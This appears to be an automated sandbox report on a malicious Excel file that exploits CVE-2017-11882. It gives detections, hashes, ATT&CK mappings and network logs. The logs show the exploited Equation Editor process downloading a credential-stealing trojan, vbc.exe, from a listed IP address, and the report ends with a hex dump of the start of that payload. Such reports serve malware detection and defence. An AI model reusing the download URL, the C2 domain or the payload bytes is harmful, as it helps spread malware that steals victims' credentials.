    Source: C:\Users\Public\vbc.exe, Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    barindex
    Source: Yara match, File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara match, File source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    MITRE ATT&CK Matrix (numbers in parentheses are the counts of matched signatures shown in the report):

    Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
    Valid Accounts | Scripting (1) | Path Interception | Process Injection (11) | Masquerading (111) | OS Credential Dumping | Security Software Discovery (11) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
    Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Extra Window Memory Injection (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (33) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
    Domain Accounts | Exploitation for Client Execution (22) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (21) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
    Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (11) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (121) | SIM Card Swap | Carrier Billing Fraud |
    Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
    Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (2) | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
    External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (2) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
    Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
    Source | Detection | Scanner | Label
    TedarikciSiparisi_83613 .xlsx | 34% | ReversingLabs | Document-OLE.Exploit.CVE-2017-11882

    Source | Detection | Scanner | Label
    C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 41% | ReversingLabs | Win32.Trojan.Pwsx
    C:\Users\Public\vbc.exe | 41% | ReversingLabs | Win32.Trojan.Pwsx

    Source | Detection | Scanner | Label
    4.2.vbc.exe.300000.0.unpack | 100% | Avira | HEUR/AGEN.1222351

    No Antivirus matches

    Source | Detection | Scanner | Label
    http://180.214.238.224/__cloud_for_file/vbc.exe95C: | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exeu | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exe | 100% | Avira URL Cloud | malware
    http://180.214.238.224/__cloud_for_file/vbc.exeX | 0% | Avira URL Cloud | safe
    http://180.214.238.224/__cloud_for_file/vbc.exehhC: | 0% | Avira URL Cloud | safe
    www.mentalnayaarifmetika.online/ocgr/ | 100% | Avira URL Cloud | malware
    http://180.214.238.224/__cloud_for_file/vbc.exej | 0% | Avira URL Cloud | safe
    No contacted domains info

    Name | Malicious | Antivirus Detection | Reputation
    http://180.214.238.224/__cloud_for_file/vbc.exe | true | Avira URL Cloud: malware | unknown
    www.mentalnayaarifmetika.online/ocgr/ | true | Avira URL Cloud: malware | low

    Name | Source | Malicious | Antivirus Detection | Reputation
    http://180.214.238.224/__cloud_for_file/vbc.exe95C: | EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeu | EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exeX | EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exehhC: | EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    http://180.214.238.224/__cloud_for_file/vbc.exej | EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    IP | Domain | Country | ASN | ASN Name | Malicious
    180.214.238.224 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true
    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:626598
    Start date and time:14/05/2022 15:12:57 (2022-05-14 15:12:57 +02:00)
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 6m 34s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:TedarikciSiparisi_83613 .xlsx
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.expl.evad.winXLSX@6/18@0/1
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
    • Successful, ratio: 1% (good quality ratio 0.8%)
    • Quality average: 56.5%
    • Quality standard deviation: 32.2%
    HCA Information:
    • Successful, ratio: 99%
    • Number of executed functions: 33
    • Number of non-executed functions: 4
    Cookbook Comments:
    • Found application associated with file extension: .xlsx
    • Adjust boot time
    • Enable AMSI
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    Time | Type | Description
    15:14:38 | API Interceptor | 88x Sleep call for process: EQNEDT32.EXE modified
    15:14:43 | API Interceptor | 19x Sleep call for process: vbc.exe modified
    Match | Associated Sample Name / URL | Detection | Context
    180.214.238.224 | ntrebare ES220062.xlsx | malicious | 180.214.238.224/cloudfile/vbc.exe
    180.214.238.224 | Comanda furnizorului-83613.xlsx | malicious | 180.214.238.224/365space/vbc.exe
    No context
    No context
    No context
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:downloaded
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Reputation:low
    IE Cache URL:http://180.214.238.224/__cloud_for_file/vbc.exe
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):10202
    Entropy (8bit):7.870143202588524
    Encrypted:false
    SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
    MD5:66EF10508ED9AE9871D59F267FBE15AA
    SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
    SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
    SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
    Category:dropped
    Size (bytes):4396
    Entropy (8bit):7.884233298494423
    Encrypted:false
    SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
    MD5:22FEC44258BA0E3A910FC2A009CEE2AB
    SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
    SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
    SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
    Category:dropped
    Size (bytes):1099960
    Entropy (8bit):2.0152800116954332
    Encrypted:false
    SSDEEP:3072:vXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:1ahIFdyiaT2qtXl
    MD5:BD4C089D8210CF4FCF74013334B2B925
    SHA1:1B98EDBC5386B92D82AC9B6174DEE1BC5411CC5E
    SHA-256:BC1A75F99B79C98350DA4BB5561EAC01186DACF8D64F3AE8D4822E1A028644D9
    SHA-512:5D7A6FB4798CC15FFDEF6F5282CD2A07034C4C8C92AFFF6199382F0FA72E9C8B46C625D3B0A7311AD5E3D1EBE27DBDD3E35166A758DC0DB8D974A722FB20B48C
    Malicious:false
    Reputation:high, very likely benign file
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
    Category:dropped
    Size (bytes):5396
    Entropy (8bit):7.915293088075047
    Encrypted:false
    SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
    MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
    SHA1:556C229F539D60F1FF434103EC1695C7554EB720
    SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
    SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category:dropped
    Size (bytes):2647
    Entropy (8bit):7.8900124483490135
    Encrypted:false
    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category: dropped
    Size (bytes): 11303
    Entropy (8bit): 7.909402464702408
    Encrypted: false
    SSDEEP: 192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5: 9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1: E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256: 88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512: 81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious: false
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: PNG image data, 139 x 180, 8-bit colormap, non-interlaced
    Category: dropped
    Size (bytes): 2647
    Entropy (8bit): 7.8900124483490135
    Encrypted: false
    SSDEEP: 48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5: E46357D82EBC866EEBDA98FA8F94B385
    SHA1: 76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256: B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512: 8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious: false
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: data
    Category: dropped
    Size (bytes): 512
    Entropy (8bit): 0.0
    Encrypted: false
    SSDEEP: 3::
    MD5: BF619EAC0CDF3F68D496EA9344137E8B
    SHA1: 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256: 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious: false
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: CDFV2 Encrypted
    Category: dropped
    Size (bytes): 188488
    Entropy (8bit): 7.9577593900244965
    Encrypted: false
    SSDEEP: 3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    MD5: 650BB8E5FE570BDE782BE21C4E9F421C
    SHA1: FD3FFA031546F1DFA7ED884689CA1E85941FCA1E
    SHA-256: 247838308FB5E12A258DEF82A63E3A752D1536D1771539D63CEBCF283B8154B5
    SHA-512: B288B2BFF546A427C6C683879F4AA17F60C794B8A0DF3ABFEA37451490C7F737A5BA5460FAB91E09CEA69A0E6DBF6DFF7CA65206369E7E8E19AB2058B7342CC7
    Malicious: false
    Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type: data
    Category: dropped
    Size (bytes): 165
    Entropy (8bit): 1.4377382811115937
    Encrypted: false
    SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
    MD5: 797869BB881CFBCDAC2064F92B26E46F
    SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious: true
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category: dropped
    Size (bytes): 229376
    Entropy (8bit): 7.903722597215708
    Encrypted: false
    SSDEEP: 3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5: CE42FE431B88922AB59B6FD880CADCF6
    SHA1: 652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256: 4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512: 62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious: true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    File type: CDFV2 Encrypted
    Entropy (8bit): 7.9577593900244965
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name: TedarikciSiparisi_83613 .xlsx
    File size: 188488
    MD5: 650bb8e5fe570bde782be21c4e9f421c
    SHA1: fd3ffa031546f1dfa7ed884689ca1e85941fca1e
    SHA256: 247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
    SHA512: b288b2bff546a427c6c683879f4aa17f60c794b8a0df3abfea37451490c7f737a5ba5460fab91e09cea69a0e6dbf6dff7ca65206369e7e8e19ab2058b7342cc7
    SSDEEP: 3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    TLSH: 0B041267B487283DF61262390A8B5493C52C9FCB88BBD16A468CBD75F77CE6050B243D
    Icon Hash: e4e2aa8aa4b4bcb4
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    May 14, 2022 15:14:13.788897991 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788906097 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788912058 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788927078 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788948059 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788953066 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788959980 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788969040 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788975954 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.788989067 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.788992882 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789009094 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789026976 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789031029 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789041042 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789052963 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789068937 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789072037 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789088964 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789093971 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789100885 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789113045 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789134979 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789134979 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789144039 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789156914 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.789159060 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.789192915 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.792794943 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998696089 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998732090 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998748064 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998764038 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998780966 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998800039 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998819113 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998835087 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998857975 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998868942 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998878002 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998897076 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998900890 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998903990 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998918056 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998925924 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998929977 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998945951 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998959064 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998969078 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998974085 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.998989105 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.998999119 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.999008894 CEST8049171180.214.238.224192.168.2.22
    May 14, 2022 15:14:13.999012947 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:13.999038935 CEST4917180192.168.2.22180.214.238.224
    May 14, 2022 15:14:16.539694071 CEST4917180192.168.2.22180.214.238.224
    • 180.214.238.224
    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    0 | 192.168.2.22 | 49171 | 180.214.238.224 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Timestamp | kBytes transferred | Direction | Data
    May 14, 2022 15:14:12.468460083 CEST | 2 | OUT | GET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
    May 14, 2022 15:14:12.687846899 CEST | 3 | IN | HTTP/1.1 200 OK
    Date: Sat, 14 May 2022 13:14:18 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Fri, 13 May 2022 09:07:10 GMT
    ETag: "38000-5dee0ffdad130"
    Accept-Ranges: bytes
    Content-Length: 229376
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 
18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 00 00 06 25 26 3a fe 00 00 00 1d 45 01 00 00 00 f6 ff ff ff 26 11 05 08 28 c4 00 00 06 09 1f 1c 28 11 00 00 06 14 14 11 06 28 d9 00 00 06 25 26 28 ba 00 00 06 26 1f 20 28 11 00 00 06 38 c6 00 00 00 1f 24 28 11 00 00 06 28 96 00 00 06 25 1f 28 28 11 00 00 06 11 04 a2 25 1f 2c 28 11 00 00 06 7e 3f 00 00 0a a2 25 1f 30 28 11 00 00 06 07 a2 25 1f 34 28 11 00 00 06
